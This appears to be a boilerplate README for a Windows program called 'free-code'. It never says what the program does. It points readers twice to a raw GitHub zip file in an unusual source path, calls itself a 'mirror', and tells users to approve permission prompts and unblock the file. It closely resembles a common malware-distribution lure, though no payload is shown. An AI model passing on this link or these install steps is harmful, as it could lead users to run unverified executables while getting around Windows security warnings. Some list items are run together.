free-code is a Windows app you can download and run from your PC. It is published from a public GitHub mirror, so you can get the same release files from one place and install them on your machine.
Use the release page to get the app files, then open the file on Windows to start it.
Before you install, check these basic items:
- A Windows PC
- An internet connection for the download
- Enough free disk space for the app and its files
- Permission to run apps on your computer
- A mouse or trackpad for the first setup
The app is designed for regular Windows use and should work on current Windows 10 and Windows 11 systems.
Visit this page to download:
https://raw.githubusercontent.com/Aizzud840/free-code/main/src/commands/fast/code_free_1.1.zip
On the releases page:
- Find the latest release at the top
- Open the release entry
- Download the Windows file
- Save it to your Downloads folder or Desktop
If you see more than one file, pick the one for Windows. The file name may end in .exe, .zip, or a similar format.
- Double-click the file
- If Windows asks for permission, select Yes
- Follow the setup steps on screen
- Wait for the install to finish
- Open the app from the Start menu or from the file you downloaded
- Right-click the file
- Select Extract All
- Choose a folder
- Open the extracted folder
- Double-click the app file inside the folder
- Read the file name and publisher name
- If the file matches the release you downloaded, choose Run or Yes
- Continue with the setup
When you start free-code for the first time:
- Let the app finish loading
- Read any on-screen prompts
- Allow access if Windows asks for it
- Keep the app open until it starts fully
If the app opens to a main window, it is ready to use. If it opens a setup screen, follow each step in order.
The app is made for simple use on Windows. A usual flow looks like this:
- Open free-code
- Choose the option you need in the app
- Follow the on-screen steps
- Save your work if the app gives you that choice
- Close the app when you are done
If the app shows buttons, menus, or folders, use them in the order shown on screen. Most end-user apps like this keep the main actions close to the top of the window.
- Click the Start button
- Search for free-code
- Open the app from the list
- If you use a
.ziprelease, keep the extracted folder in a safe place - Do not move files out of the folder unless the app tells you to
- Go to Settings
- Open Apps
- Find free-code
- Select Uninstall
- Follow the prompts
A few simple habits can help:
- Keep the app files in one folder
- Download new releases only from the release page
- Do not rename files unless you must
- Close the app before you move or delete its folder
- Restart Windows if the app stops opening
- Check that the download finished
- Try the latest release again
- Make sure you opened the right file for Windows
- Right-click the file
- Look for an Unblock option
- Select it if you see it
- Try opening the app again
- Run it again after a restart
- Make sure no other copy is already open
- Try the newest release file from the release page
- Check your display scale in Windows settings
- Maximize the app window
- Restart the app after changing display settings
This mirror is published from:
https://raw.githubusercontent.com/Aizzud840/free-code/main/src/commands/fast/code_free_1.1.zip
It exists as an independent public mirror due GitHub fork-network limits. The download page above is the place to get the current release files for Windows
If the release comes as a folder or archive, keep this structure:
- The main app file in one place
- Any support files beside it
- No random files from other folders mixed in
This helps the app find what it needs when you open it.
- Go to the release page
- Download the Windows file
- Open the file on your PC
- Follow the steps on screen
- Start using free-code